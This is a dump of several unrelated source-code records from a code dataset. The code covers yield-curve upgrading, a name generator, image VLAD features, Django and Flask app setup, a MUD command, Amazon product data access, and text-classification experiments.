the curve what is specified in the method UpgradeCurve()\"\n\n for yc_types in (parameters['firstRunTypes'], parameters['secondRunTypes']): # First benchmark curves are upgraded, then the rest.\n filterYieldCurveTypes[:] = list(yc_types) # Set the yield curve type filter.\n print(filterYieldCurveTypes)\n for yieldCurve in yieldCurves:\n if ValidCurve( yieldCurve ):\n changes = {}\n failures = {}\n clone = yieldCurve.Clone()\n UpgradeCurve( clone, changes, failures )\n CommitCurve( yieldCurve, clone )\n LogChanges( yieldCurve, changes, failures )\n\n# ---------------------------------------------------------------------------------------------------------\n# ---------------------------------------------------------------------------------------------------------\n# ---------------------------------------------------------------------------------------------------------\n\n","sub_path":"Python modules/Upgrade_Yieldcurves.py","file_name":"Upgrade_Yieldcurves.py","file_ext":"py","file_size_in_byte":16298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"311981487","text":"import random\nimport csv\nimport os\nfrom dotenv import load_dotenv\n\nfrom const import *\n\nTARGET_WORD_COLUMN_IDX = 0\nSIMILAR_WORD_COLUMN_IDX = 1\nSIMILARITY_COLUMN_IDX = 2\n\ndef append_target_word(target_word, similar_word_list):\n TARGET_WORD_RATE = os.environ.get('TARGET_WORD_RATE')\n if float(TARGET_WORD_RATE) > 0:\n correct_word_num = int(len(similar_word_list) * float(TARGET_WORD_RATE))\n similar_word_list += [[target_word, target_word, 1.0] for x in range(correct_word_num)]\n return similar_word_list\n\ndef create_similar_word_list_all():\n similar_word_list_all = []\n similar_word_list = []\n prev_target_word = ''\n\n dotenv_path = os.path.dirname(__file__) + '.env'\n load_dotenv(dotenv_path)\n\n with open(WORD_SOURCE_FILE_NAME, 'r') as f:\n reader = csv.reader(f)\n next(reader) # Header 捨てる\n\n for row in reader:\n current_target_word = row[TARGET_WORD_COLUMN_IDX]\n \n if prev_target_word != '' and prev_target_word != current_target_word:\n \n # 解答が正解と違いすぎるとつまらないので、正解の文字も一定数入れておく\n similar_word_list = append_target_word(prev_target_word, similar_word_list)\n similar_word_list_all.append(similar_word_list)\n similar_word_list = []\n\n # '[' ']'を取り除く\n similar_word = row[SIMILAR_WORD_COLUMN_IDX].replace('[', '').replace(']', '')\n # [米]のような ケースがあるため、取り除きの結果、ターゲットと同じになるならスキップ\n if similar_word == current_target_word:\n continue\n\n # '[' ']'を取り除いたものを使う\n row[SIMILAR_WORD_COLUMN_IDX] = similar_word\n\n similar_word_list.append(row)\n prev_target_word = current_target_word\n \n # 最後の文字リスト用\n similar_word_list = append_target_word(prev_target_word, similar_word_list)\n similar_word_list_all.append(similar_word_list)\n return similar_word_list_all\n\ndef apend_random_select_word(word_list, selected_words):\n selected_words.append(random.choice(word_list))\n return selected_words\n\n# アプリにはこちらを使う\ndef select_random_words(similar_word_list_all):\n selected_words = []\n for similar_word_list in similar_word_list_all:\n apend_random_select_word(similar_word_list, selected_words)\n return selected_words\n\n# お試し用\ndef select_words_by_rank(similar_word_list_all, rank):\n selected_words = []\n for similar_word_list in similar_word_list_all:\n selected_words.append(similar_word_list[rank-1])\n return selected_words\n\ndef join_words(selected_words):\n words = map(lambda word: word[SIMILAR_WORD_COLUMN_IDX], selected_words)\n return ''.join(words)\n\ndef calc_avg_similarity(selected_words):\n similarities = map(lambda word: float(word[SIMILARITY_COLUMN_IDX]), selected_words)\n return sum(similarities) / len(selected_words)\n\ndef format_similarity(similarity):\n return '{:.2%}'.format(float(similarity))\n\ndef format_word_similarity(selected_words):\n result = ''\n for word in selected_words:\n target_word = word[TARGET_WORD_COLUMN_IDX]\n similar_word = word[SIMILAR_WORD_COLUMN_IDX]\n formatted_words = f'[{target_word}-{similar_word}]'.ljust(7, ' ')\n \n formatted_similarity = format_similarity(word[SIMILARITY_COLUMN_IDX])\n result += f'\\n{formatted_words} 類似度: {formatted_similarity}'\n return result\n\ndef format_all_result(selected_words):\n name = join_words(selected_words)\n name_similarity = format_similarity(calc_avg_similarity(selected_words))\n # print(name_similarity, name)\n\n format_name_similarity = f'平均類似度: {name_similarity}'\n similarity_detail = format_word_similarity(selected_words)\n return f'{name}\\n{similarity_detail}\\n{format_name_similarity}'\n\ndef generate_formatted_random_name():\n similar_word_list_all = create_similar_word_list_all()\n selected_words = select_random_words(similar_word_list_all)\n return format_all_result(selected_words)\n\nif __name__ == \"__main__\":\n for i in range(1):\n text = generate_formatted_random_name()\n print(text)","sub_path":"similar_name_generator.py","file_name":"similar_name_generator.py","file_ext":"py","file_size_in_byte":4317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"360495145","text":"import cv2\nfrom scipy.cluster.vq import vq\nfrom sklearn.cluster import MiniBatchKMeans\nfrom sklearn.preprocessing import StandardScaler\nimport numpy as np\nimport os\nfrom sklearn.externals import joblib\n\nclass Vlad(object):\n\n\tdef __init__(self, num_clusters = 8):\n\t\tself.num_clusters = num_clusters\n\t\tself.flag = False\n\t\tself.this_dir = os.path.abspath(os.path.dirname(__file__))\n\n\tdef load(self, vlad_file='../models/vlad.pkl'):\n\t\tvlad_file = os.path.join(self.this_dir, vlad_file)\n\t\tself.stdSlr, self.centers = joblib.load(vlad_file)\n\t\tself.flag = True\n\n\tdef save(self, vlad_file='../models/vlad.pkl'):\n\t\tvlad_file = os.path.join(self.this_dir, vlad_file)\n\t\tjoblib.dump((self.stdSlr, self.centers), vlad_file, compress=3)\n\n\tdef cal_vlad(self, descriptors, centers):\n\t\tif self.flag is False:\n\t\t\tself.load()\n\t\tif self.stdSlr is not None:\n\t\t\tdescriptors = self.stdSlr.transform(descriptors)\n\t\tdimensions = descriptors[0].shape[0]\n\t\tvlad_vector = np.zeros((len(centers),dimensions), dtype=np.float32)\n\t\tcenter_idx, distance = vq(descriptors, centers)\n\t\tfor i,idx in enumerate(center_idx):\n\t\t\tvlad_vector[idx] += (descriptors[i] - centers[idx])\n\t\tvlad_vector = cv2.normalize(vlad_vector)\n\t\tvlad_vector = vlad_vector.flatten()\n\t\treturn vlad_vector\n\n\tdef fit(self, descs, preprocess=True):\n\t\tif preprocess:\n\t\t\tself.stdSlr = StandardScaler()\n\t\t\tself.stdSlr.fit(descs)\n\t\t\ttmp = self.stdSlr.transform(descs)\n\t\telse:\n\t\t\ttmp = descs\n\t\t\tself.stdSlr = None\n\t\tkmeans = MiniBatchKMeans(init='k-means++', n_clusters=self.num_clusters, batch_size=10000)\n\t\tkmeans.fit(tmp)\n\t\tself.centers = kmeans.cluster_centers_\n\t\tself.clusters = kmeans.labels_\n\t\treturn self.centers\n\n\tdef transform(self, descriptor):\n\t\treturn self.norm(self.cal_vlad(descriptor, self.centers))\n\n\tdef norm(self, fv):\n\t\tdatasets = np.sqrt(np.abs(fv)) * np.sign(fv)\n\t\tnorms = np.sqrt((datasets ** 2).sum())\n\t\treturn datasets/norms","sub_path":"python/CBIR/my_package/vlad.py","file_name":"vlad.py","file_ext":"py","file_size_in_byte":1879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"501306175","text":"#!/usr/local/bin/python3\n\"\"\"Produce a listing of people's names, ages and weights.\"\"\"\n\ndata = [\n (\"Steve\", 59, 202),\n (\"Dorothy\", 49, 99),\n (\"Simon\", 39, 155),\n (\"David\", 61, 135) ]\n\n#for row in data:\n# print(\"{0[0]:<12s} {0[1]:4d} {0[2]:4d}\".format(row))\n\nfor name, age, weight in data:\n print(\"{0:.<12s}{1:.>4d}{2:.>10d}\".format(name, age, weight))\n\n","sub_path":"personlist.py","file_name":"personlist.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"346826149","text":"from django.http import HttpResponse\nfrom .models import Ranking\nimport json\n\ndef get_all_data(request):\n # a function to retrieve all data from database\n if request.method == 'GET':\n data = {\"data\": []}\n qs = Ranking.objects.all()\n for one_rank in qs:\n data['data'].append({\n \"id\": one_rank.id,\n \"year\": one_rank.yearRange,\n \"location\": one_rank.location,\n \"type\": one_rank.type,\n \"total_number\": one_rank.total_number\n })\n return HttpResponse(status=200, content=json.dumps(data), content_type='application/json')\n else:\n return HttpResponse(status=405)\n\ndef getDistinctValue(request):\n # a function to retrieve the data that can be dumped into the filters\n if request.method=='GET':\n data = {\"yearRange\": [], 'location':[],'type':[]}\n yearRange = Ranking.objects.distinct().order_by().values('yearRange')\n location = Ranking.objects.distinct().order_by().values('location')\n type = Ranking.objects.distinct().order_by().values('type')\n for i in yearRange:\n data['yearRange'].append(i['yearRange'])\n for j in location:\n data['location'].append(j['location'])\n for j in type:\n data['type'].append(j['type'])\n return HttpResponse(status=200, content=json.dumps(data), content_type='application/json')\n else:\n return HttpResponse(status=405)\n\n\ndef getVaccinationForTwoLocation(request):\n # a function to retrieve the vaccination information based on the location and year filters.\n import json\n if request.method=='POST':\n data = {'location1':[],'location2':[]}\n body = json.loads(request.body)\n qs = Ranking.objects.filter(location = body.get('location1'), yearRange=body.get(\"year\"))\n qs2 =Ranking.objects.filter(location = body.get('location2'), yearRange=body.get(\"year\"))\n\n for one_rank in qs:\n data['location1'].append({\n \"type\": one_rank.type,\n \"total_number\": one_rank.total_number\n })\n for one_rank in qs2:\n data['location2'].append({\n \"type\": one_rank.type,\n \"total_number\": one_rank.total_number\n })\n\n return HttpResponse(status=200, content=json.dumps(data), content_type='application/json')\n else:\n return HttpResponse(status=405)\n","sub_path":"mysite/polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"37523367","text":"from flask import Flask, render_template, url_for\nfrom flask.ext.assets import Environment, Bundle\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom celery import Celery\n\ndef make_celery(app):\n celery = Celery(app.import_name, broker=app.config['CELERY_BROKER_URL'])\n celery.conf.update(app.config)\n TaskBase = celery.Task\n class ContextTask(TaskBase):\n abstract = True\n def __call__(self, *args, **kwargs):\n with app.app_context():\n return TaskBase.__call__(self, *args, **kwargs)\n celery.Task = ContextTask\n return celery\n\n# create app object and configure\napp = Flask(__name__)\napp.config.from_object('config')\n\n# create celery object\ncelery = make_celery(app)\n\n# initialize flask-assets\nassets = Environment()\nassets.init_app(app)\n# register system wide CSS assets as 'main_css'\nassets.register('main_css',\n 'css/bootstrap.min.css',\n 'css/responsive.min.css',\n 'css/style.css',\n 'font/elusive-icons/css/elusive-webfont.min.css',\n output='cached.css', filters='cssmin')\n\nassets.register('main_js',\n 'js/bootstrap.js',\n 'js/application.js',\n output='cached.js', filters='jsmin')\n\n# initialize flask-sqlalchemy\ndb = SQLAlchemy(app)\n\nclass Base(db.Model):\n __abstract__ = True\n id = db.Column(db.Integer, primary_key=True)\n created_at = db.Column(db.DateTime, default=db.func.current_timestamp())\n updated_at = db.Column(db.DateTime, default=db.func.current_timestamp(),\n onupdate=db.func.current_timestamp())\n\n# define global error handlers\n@app.errorhandler(404)\ndef not_found(error):\n return render_template('404.html'), 404\n\n# load flask-blueprint apps\nfrom app.mod_home.views import mod_home\nfrom app.mod_orders.views import mod_orders\n\napp.register_blueprint(mod_home)\napp.register_blueprint(mod_orders)\n\n# create db while debugging\nif app.config['DEBUG']:\n db.create_all()\n","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"353469851","text":"\nfrom __future__ import annotations\n\nfrom typing import List\nfrom typing import Type\n\nfrom component.role import Role\nfrom component.room import Room\n\nfrom event.event import Event\nfrom message.message import Message\nfrom system.channel import Channel\n\nfrom logcat.logcat import LogCat\n\nclass CmdLook:\n @LogCat.log_func\n def __init__(self, servant: Type[Handler]):\n servant.on(Event.CMD_LOOK, self._on_cmd_look)\n servant.on(Event.CMD_ABBR_LOOK, self._on_cmd_look)\n\n @LogCat.log_func\n def _on_cmd_look(\n self, e: Event, entity: str = '', args: List[str] = []\n ) -> None:\n role = Role.instance(entity)\n\n if not args:\n room = Room.instance(role.room)\n\n text = f'{room.name} -'\n Channel.toRole(entity, Message.TEXT, text)\n\n for text in room.description:\n Channel.toRole(entity, Message.TEXT, text)\n\n if not room.exits:\n text = '這裡沒有出口'\n else:\n text = room.exits\n else:\n text = f'你在看什麼?'\n\n Channel.toRole(entity, Message.TEXT, text)\n\n# cmd_look.py\n","sub_path":"muted/system/cmd_look.py","file_name":"cmd_look.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"427397204","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\n\nfrom sklearn import preprocessing\n\nfrom data.data_loader import data_loader, DataLoader, Utterance\nfrom classify import configuration\nfrom classify.feature_extractor import Feature_Extractor\nfrom classify.exp_shallowmodel import ShallowExperimenter\nimport numpy as np\nimport os\n\n__author__ = \"Rui Meng\"\n__email__ = \"rui.meng@pitt.edu\"\n\nif __name__ == '__main__':\n # initialize\n config = configuration.load_config()\n extractor = Feature_Extractor(config)\n exp = ShallowExperimenter(config)\n\n best_results = {}\n # iterate each dataset\n for data_name in config['data_names']:\n config.param['data_name'] = data_name\n\n config.logger.info('*' * 50)\n config.logger.info('-' * 20 + data_name + '-' * 20)\n config.logger.info('*' * 50)\n # initialize data_loader\n loader = data_loader(data_name, {'config': config})\n config['data_loader'] = loader\n loader()\n # load annotated data\n session_ids, annotated_sessions = loader.load_annotated_data()\n loader.stats()\n\n # train and test\n X_raw, Y, _ = extractor.split_to_instances(annotated_sessions)\n X = extractor.extract()\n\n \"\"\"\n '''\n the 1st version is scaled to zero-mean and uni-variance\n now it's scaled with MinMaxScaler to make feature values non-negative\n '''\n # print(\"Checkinf for NaN and Inf\")\n # print(\"np.inf=\", np.where(X<0))\n # print(\"np.inf=\", np.where(np.isnan(X)))\n # print(\"is.inf=\", np.where(np.isinf(X)))\n # print(\"np.max=\", np.max(abs(X)))\n\n if config['experiment_mode'] == 'feature_selection' or config['experiment_mode'] == 'print_important_features':\n result = exp.run_cross_validation_with_discrete_feature_selection(X, Y)\n elif config['experiment_mode'] == 'leave_one_out' or config['experiment_mode'] == 'keep_one_only':\n result = exp.run_cross_validation_with_leave_one_out(X, Y)\n elif config['experiment_mode'] == 'reformulation_detection' or config['experiment_mode'] == 'task_boundary_detection':\n result = exp.run_cross_validation_binary_task(X, Y)\n elif config['experiment_mode'] == 'bad_case':\n result = exp.run_cross_validation_bad_case(X, Y)\n elif config['experiment_mode'] == 'normal_cv':\n result = exp.run_cross_validation(X, Y)\n elif config['experiment_mode'] == 'single_run':\n result = exp.run_single_pass(X, Y)\n elif config['experiment_mode'] == 'single_run_context_feature':\n result = exp.run_single_pass_context_feature(X, Y)\n else:\n assert \"experiment type invalid\"\n\n # find the best classifier (with best F1-score)\n # result = result[np.asarray(result).T[4].argmax()]\n # best_results[data_name] = result\n\n \"\"\"\n # exp.export_summary(best_results.values(), os.path.join(config.param['experiment_path'], 'best_of_each_dataset.csv'))","sub_path":"dialogue/deprecated/classify/entry_cv.py","file_name":"entry_cv.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"551242889","text":"# https://www.geeksforgeeks.org/count-even-length-binary-sequences-with-same-sum-of-first-and-second-half-bits/\n\ndef countSeq(n):\n countSeqArr = [-1]*(n+1)\n countSeqArr[0] = 1\n i = 1\n SUM = 1\n while (i= from_date),\n Bsr.date < to_date,\n Bsr.asin.IN(set_asins))\n bsr_entities = query.fetch()\n return bsr_entities\n \n def getKeywordRanks(self, list_asins, list_keywords, from_date, to_date):\n set_asins = set(list_asins)\n set_keywords = set(list_keywords)\n query = KeywordRank.query(\n ndb.AND(KeywordRank.date >= from_date),\n KeywordRank.date < to_date,\n KeywordRank.keyword.IN(set_keywords),\n KeywordRank.asin.IN(set_asins))\n keyword_entities = query.fetch()\n return keyword_entities\n \n def getKeywords(self):\n return self.lKeywords\n \n def getProductSearchLimit(self):\n return 25\n \n def getAsins(self):\n return self.lAsins\n \n def getBaziliqAsin(self):\n return self.baziliq_asin\n \n def updateProductByProperties(self, db_product, amazon_product, amazon_api_access_layer, property_names_to_update = None):\n ''' parameters: db_product - ProductListing\n amazon_product - AmazonProduct\n amazon_api_access_layer - AmazonDataAccessLayer\n property_names_to_update - list of changed property names\n \n updating db_product with all the changes from amazon_product, and writing the up-to-date product back to the Datastore\n '''\n if not property_names_to_update:\n return\n \n need_to_update = False\n for property_name in property_names_to_update:\n if property_name == 'title' and db_product.title != amazon_product.title:\n db_product.title = amazon_product.title\n need_to_update = True\n elif property_name == 'author' and db_product.author != amazon_product.author:\n db_product.author = amazon_product.author\n need_to_update = True\n elif property_name == 'brand' and db_product.brand != amazon_product.brand:\n db_product.brand = amazon_product.brand\n need_to_update = True\n elif property_name == 'binding' and db_product.binding != amazon_product.binding:\n db_product.binding = amazon_product.binding\n need_to_update = True\n elif property_name == 'label' and db_product.label != amazon_product.label:\n db_product.label = amazon_product.label\n need_to_update = True\n elif property_name == 'price':\n if not amazon_product.price_and_currency[0] or db_product.price != float(amazon_product.price_and_currency[0]):\n try:\n db_product.price = float(amazon_product.price_and_currency[0])\n except TypeError:\n db_product.price = None\n need_to_update = True\n elif property_name == 'manufacturer' and db_product.manufacturer != amazon_product.manufacturer:\n db_product.manufacturer = amazon_product.manufacturer\n need_to_update = True\n elif property_name == 'url' and db_product.url != amazon_api_access_layer.getProductUrl(amazon_product):\n db_product.url = amazon_api_access_layer.getProductUrl(amazon_product)\n need_to_update = True\n elif property_name == 'features' and db_product.features != amazon_product.features:\n db_product.features = amazon_product.features\n need_to_update = True\n elif property_name == 'image_urls' and \\\n set(db_product.image_urls) != set([lxml.etree.tostring(image.LargeImage.URL) for image in amazon_product.images]):\n db_product.image_urls = [lxml.etree.tostring(image.LargeImage.URL) for image in amazon_product.images]\n need_to_update = True\n elif property_name == 'reviews':\n db_product.reviews = {star: amazon_api_access_layer.getReviews(amazon_product, star) \\\n for star in xrange(1,6)}\n need_to_update = True\n \n if need_to_update:\n db_product.put()\n \n \n def getProductChangeHistory(self, asin, from_date = datetime.datetime.now(), to_date = datetime.datetime.now()):\n from_date = from_date.replace(hour=0, minute=0, second=0, microsecond=0) # beginning of the day\n to_date = to_date.replace(hour=23, minute=59, second=59, microsecond=0) # end of the day\n query = ProductChangeHistory.query(\n ndb.AND(ProductChangeHistory.creation_date >= from_date),\n ProductChangeHistory.creation_date < to_date,\n ProductChangeHistory.asin == asin).get()\n product_change_history = query.fetch(100)\n \n if not product_change_history:\n logging.debug('ProductChangeHistory not found')\n else:\n logging.debug('found %d ProductChangeHistory', len(product_change_history))\n \n return product_change_history\n ","sub_path":"x-sell/amzmri/dal/xsellDataAccessLayer.py","file_name":"xsellDataAccessLayer.py","file_ext":"py","file_size_in_byte":6776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"101498302","text":"#!/usr/bin/env python\r\n# coding: utf-8\r\n\r\n# Importing libraries\r\nimport os\r\nimport re\r\nimport logging\r\nimport pandas as pd\r\nimport numpy as np\r\nimport nltk.data\r\nfrom bs4 import BeautifulSoup\r\nfrom nltk.corpus import stopwords\r\nfrom gensim.models.word2vec import Word2Vec\r\nfrom sklearn import naive_bayes, svm, preprocessing\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom sklearn.ensemble import RandomForestClassifier as RFC\r\nfrom sklearn.model_selection import cross_val_score\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.feature_selection.univariate_selection import chi2, SelectKBest\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.naive_bayes import MultinomialNB\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.model_selection import cross_val_predict\r\n# import scikitplot as skplt\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.calibration import CalibratedClassifierCV\r\nimport time\r\n\r\n\r\n# Pre-processing movie reviews\r\ndef clean_review(raw_review):\r\n # Remove HTML markup\r\n text = BeautifulSoup(raw_review, features=\"html.parser\")\r\n\r\n # Removing digits and punctuation\r\n text = re.sub(\"[^a-zA-Z]\", \" \", text.get_text())\r\n\r\n # Converting to lowercase\r\n text = text.lower().split()\r\n\r\n # Removing stopwords\r\n stops = set(stopwords.words(\"english\"))\r\n words = [w for w in text if w not in stops]\r\n\r\n # Return a cleaned string\r\n return \" \".join(words)\r\n\r\n\r\n# Generates a feature vector(word2vec averaging) for each movie review\r\ndef review_to_vec(words, model, num_features):\r\n \"\"\"\r\n This function generates a feature vector for the given review.\r\n Input:\r\n words: a list of words extracted from a review\r\n model: trained word2vec model\r\n num_features: dimension of word2vec vectors\r\n Output:\r\n a numpy array representing the review\r\n \"\"\"\r\n\r\n feature_vec = np.zeros((num_features), dtype=\"float32\")\r\n word_count = 0\r\n\r\n # index2word_set is a set consisting of all words in the vocabulary\r\n index2word_set = set(model.index2word)\r\n\r\n for word in words:\r\n if word in index2word_set:\r\n word_count += 1\r\n feature_vec += model[word]\r\n\r\n feature_vec /= word_count\r\n return feature_vec\r\n\r\n\r\n# Generates vectorized movie reviews\r\ndef gen_review_vecs(reviews, model, num_features):\r\n \"\"\"\r\n Function which generates a m-by-n numpy array from all reviews,\r\n where m is len(reviews), and n is num_feature\r\n Input:\r\n reviews: a list of lists.\r\n Inner lists are words from each review.\r\n Outer lists consist of all reviews\r\n model: trained word2vec model\r\n num_feature: dimension of word2vec vectors\r\n Output: m-by-n numpy array, where m is len(review) and n is num_feature\r\n \"\"\"\r\n\r\n curr_index = 0\r\n review_feature_vecs = np.zeros((len(reviews), num_features), dtype=\"float32\")\r\n\r\n for review in reviews:\r\n\r\n if curr_index % 1000 == 0.:\r\n print(\"Vectorizing review %d of %d\" % (curr_index, len(reviews)))\r\n\r\n review_feature_vecs[curr_index] = review_to_vec(review, model, num_features)\r\n curr_index += 1\r\n\r\n return review_feature_vecs\r\n\r\n\r\n# TFIDF vectorization\r\ndef tfidf_vectorizer(train_list, test_list, train_data, test_data):\r\n stop_words_list = [\"ke\",\"ka\",\"ek\",\"mein\",\"kee\", \"hai\",\"yah\",\"aur\",\"se\",\"hain\",\"ko\",\"par\",\"is\",\"hota\",\"ki\", \"jo\",\"kar\", \"me\", \"gaya\", \"karane\", \"kiya\",\"liye\",\r\n \"apane\", \"ne\", \"banee\", \"nahin\", \"to\", \"hee\",\"ya\",\"evan\", \"diya\", \"ho\",\"isaka\", \"tha\",\"dvaara\", \"hua\",\"tak\",\"saath\",\"karana\",\"vaale\", \"baad\",\r\n \"lie\", \"aap\", \"kuchh\", \"sakate\",\"kisee\", \"ye\", \"isake\", \"sabase\", \"isamen\", \"the\", \"do\", \"hone\",\"vah\",\"ve\",\"karate\",\"bahut\",\"kaha\", \"varg\",\r\n \"kaee\",\"karen\",\"hotee\", \"apanee\",\"unake\", \"thee\", \"yadi\",\"huee\",\"ja\", \"na\", \"ise\", \"kahate\", \"jab\",\"hote\", \"koee\",\"hue\", \"va\", \"na\",\"abhee\",\r\n \"jaise\",\"sabhee\", \"karata\", \"unakee\", \"tarah\", \"us\", \"aadi\", \"kul\", \"es\",\"raha\", \"isakee\",\"sakata\", \"rahe\",\"unaka\",\"isee\",\"rakhen\", \"apana\", \"pe\",\"usake\"]\r\n for i in range(0, len(train_data.review)):\r\n\r\n # Append raw texts as TFIDF vectorizers take raw texts as inputs\r\n train_list.append(clean_review(train_data.review[i]))\r\n if i % 1000 == 0:\r\n print(\"Cleaning training review\", i)\r\n\r\n for i in range(0, len(test_data.review)):\r\n\r\n # Append raw texts as TFIDF vectorizers take raw texts as inputs\r\n test_list.append(clean_review(test_data.review[i]))\r\n if i % 1000 == 0:\r\n print(\"Cleaning test review\", i)\r\n # print(clean_review(test_data.review[i]))\r\n count_vec = TfidfVectorizer(min_df=0,max_df=0.6,ngram_range=(0, 1), sublinear_tf=True,norm='l2',stop_words=None)\r\n print(\"Vectorizing input texts\")\r\n train_vec = count_vec.fit_transform(train_list)\r\n test_vec = count_vec.transform(test_list)\r\n print(test_vec.shape)\r\n return train_vec, test_vec, count_vec\r\n\r\n\r\n# Performing dimensionality reduction using SelectKBest\r\ndef dimensionality_reduction(train_vec, test_vec, y_train_data):\r\n print(\"Performing feature selection based on chi2 independence test\")\r\n fselect = SelectKBest(chi2, k=4500)\r\n train_vec = fselect.fit_transform(train_vec, y_train_data)\r\n test_vec = fselect.transform(test_vec)\r\n return train_vec, test_vec\r\n\r\nfrom sklearn import metrics\r\n# Multinomial Naive Bayes classifier\r\ndef naive_bayes(train_vec, test_vec, y_train_data):\r\n start = time.time()\r\n nb = MultinomialNB(alpha=1)\r\n # param = {'alpha':[1e-1,0.3,0.7,0.9,1.1]}\r\n # nb = GridSearchCV(nb, param, cv=5, scoring=\"roc_auc\")\r\n # nb.fit(train_vec,y_train_data)\r\n # print(\"best_score:\",nb.best_score_)\r\n # print(\"best_etimator: \", nb.best_params_)\r\n cv_score = cross_val_score(nb, train_vec, y_train_data, cv=5,scoring=\"roc_auc\")\r\n print(\"Training Multinomial Naive Bayes\")\r\n nb = nb.fit(train_vec, y_train_data)\r\n pred_naive_bayes = nb.predict(test_vec)\r\n\r\n # print(pred_naive_bayes)\r\n print(\"CV Score = \", cv_score)\r\n print(\"Total time taken for Multinomial Naive Bayes is \", time.time() - start, \" seconds\")\r\n result = nb.predict_proba(test_vec)\r\n result = [i[1] for i in result]\r\n test_auc = metrics.roc_auc_score(np.array(test_label1), result) # 验证集上的auc值\r\n print(\"test_auc:\",test_auc)\r\n\r\n # print(result[:10])\r\n return pred_naive_bayes, result\r\n\r\n\r\n# Random Forest classifier\r\ndef random_forest(train_vec, test_vec, y_train_data):\r\n start = time.time()\r\n rfc = RFC(n_estimators=200, oob_score=True, max_features=\"auto\")\r\n cv_score = cross_val_score(rfc, train_vec, y_train_data, cv=5, scoring=\"roc_auc\")\r\n print(\"Training %s\" % (\"Random Forest\"))\r\n rfc = rfc.fit(train_vec, y_train_data)\r\n\r\n print(\"OOB Score =\",cv_score)\r\n pred_random_forest = rfc.predict(test_vec)\r\n print(\"Total time taken for Random Forest is \", time.time() - start, \" seconds\")\r\n\r\n return pred_random_forest\r\n\r\n\r\n# Linear SVC classifier\r\ndef linear_svc(train_vec, test_vec, y_train_data):\r\n start = time.time()\r\n svc = svm.LinearSVC(C=0.8, class_weight=None, dual=True, fit_intercept=True,\r\n intercept_scaling=1, loss='ovr', max_iter=1000,\r\n multi_class='crammer_singer', penalty='l2', random_state=None, tol=0.0001,\r\n verbose=0)\r\n # svc = CalibratedClassifierCV(svc)\r\n\r\n # param = {'max_iter': [10000], 'C': [1e15, 1e13, 1e11, 1e9, 1e7, 1e5, 1e3, 1e1, 1e-1, 1e-3, 1e-5]}\r\n # param = {'max_iter': [600,800,1000], 'C': [ 1e5,1e3, 1e1, 1e-1, 1e-3]}\r\n # print(\"Training SVC\")\r\n # svc = GridSearchCV(svc, param, cv=5)\r\n # svc = svc.fit(train_vec, y_train_data)\r\n # # pred_linear_svc = svc.predict(test_vec)\r\n # print(\"Optimized parameters:\", svc.best_estimator_)\r\n # print(\"Best CV score:\", svc.best_score_)\r\n # print(\"Total time taken for Linear SVC is \", time.time() - start, \" seconds\")\r\n # print(\"Generating confusion matrix\")\r\n svc1 = CalibratedClassifierCV(svc)\r\n svc1.fit(train_vec,y_train_data)\r\n result = svc1.predict_proba(test_vec)\r\n\r\n svc_score = cross_val_score(svc,train_vec,y_train_data,cv=5,scoring=\"roc_auc\")\r\n print(\"svc roc:\",svc_score)\r\n svc = svc.fit(train_vec, y_train_data)\r\n pred_linear_svc = svc.predict(test_vec)\r\n\r\n result = [i[1] for i in result]\r\n test_auc = metrics.roc_auc_score(np.array(test_label1), result) # 验证集上的auc值\r\n print(\"test_auc:\", test_auc)\r\n # Below confusion matrix code is commented as it takes a lot of time to run. The plots have been added in the project report.\r\n # predictions = cross_val_predict(svc, train_vec, y_train_data)\r\n # skplt.metrics.plot_confusion_matrix(y_train_data, predictions)\r\n # plt.show()\r\n print(result[:10])\r\n return pred_linear_svc,result\r\n\r\n\r\n# SVM Classifier using cross validation\r\ndef svm_cross_validation(train_x, test_ver, train_y):\r\n from sklearn.svm import SVC\r\n model = SVC(kernel='rbf', probability=True)\r\n param_grid = {'C': [0.01,0.1,1, 10, 100, 1000,1500,2000], 'gamma': [0.1,0.01,0.001]}\r\n grid_search = GridSearchCV(model, param_grid, verbose=1, cv=5)\r\n grid_search.fit(train_x, train_y)\r\n print(\"svc best score:\",grid_search.best_score_)\r\n best_parameters = grid_search.best_estimator_.get_params()\r\n for para, val in list(best_parameters.items()):\r\n print(para, val)\r\n model = SVC(kernel='rbf', C=best_parameters['C'], gamma=best_parameters['gamma'], probability=True)\r\n model.fit(train_x, train_y)\r\n predict_res = model.predict(test_ver)\r\n print(predict_res[:10])\r\n\r\n return predict_res\r\n\r\n\r\n# Logistic Regression\r\ndef logistic_regression(train_vec, test_vec, y_train_data):\r\n start = time.time()\r\n # clf = LogisticRegression(random_state=0, solver='liblinear', max_iter=10000, multi_class='multinomial')\r\n clf = LogisticRegression(random_state=0, solver='newton-cg', max_iter=5000, multi_class='multinomial',class_weight='balanced',C=1.5)\r\n cv_score = cross_val_score(clf, train_vec, y_train_data, cv=5, scoring='roc_auc')\r\n print(\"Training Logistic Regression\")\r\n clf = clf.fit(train_vec, y_train_data)\r\n pred_logistic = clf.predict(test_vec)\r\n print(\"CV Score = \", 